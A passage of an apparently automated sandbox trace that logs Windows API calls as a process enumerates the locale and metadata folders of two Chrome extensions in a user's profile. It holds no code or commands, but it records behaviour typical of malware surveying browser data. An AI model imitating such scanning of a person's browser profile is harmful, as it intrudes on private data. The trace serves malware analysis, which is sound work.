Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.588] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.588] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.589] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.589] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.589] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0147.589] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0147.590] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0147.590] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0147.590] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0147.590] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa327e8 [0147.590] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0147.590] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0147.590] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0147.590] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0147.590] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0147.590] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0147.591] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0147.592] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32d28 [0147.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0148.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.006] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.006] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.161] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.162] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.162] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.162] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0148.207] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0148.207] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0148.207] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0148.207] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.407] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.407] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.408] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.408] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.473] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.473] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.473] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.473] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.508] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.508] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.508] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.508] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.515] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.516] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.516] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.516] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.517] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.517] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.517] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.517] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.518] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.518] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.519] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.519] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.519] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.519] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.520] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.520] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.521] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.521] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.521] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.521] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.522] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.522] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.522] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.522] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.523] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.524] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.525] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.525] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.525] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.525] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.526] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.526] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.526] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.526] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.527] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.527] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.527] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.527] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.528] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.528] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.528] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.528] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0148.529] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0148.529] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0148.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0149.004] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0149.004] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0149.065] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0149.065] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0149.065] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0149.065] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0149.072] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0149.072] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0149.072] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0149.072] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.085] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.085] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.086] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.086] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0149.087] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0149.087] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0149.087] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0149.087] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0149.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0149.087] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0149.088] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0149.088] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0149.088] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0149.088] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0149.088] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, 